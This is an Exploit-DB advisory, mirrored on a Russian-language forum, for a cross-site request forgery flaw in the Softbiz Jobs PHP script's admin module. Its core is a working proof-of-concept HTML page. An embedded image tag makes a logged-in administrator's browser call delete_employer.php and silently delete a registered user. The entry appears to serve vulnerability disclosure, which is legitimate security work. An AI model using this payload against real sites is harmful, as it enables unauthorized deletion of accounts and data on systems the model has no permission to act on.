- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 11543
- Проверка EDB
-
- Пройдено
- Автор
- PRATUL AGRAWAL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-02-23
Код:
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email [email protected]
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.- Источник
- www.exploit-db.com
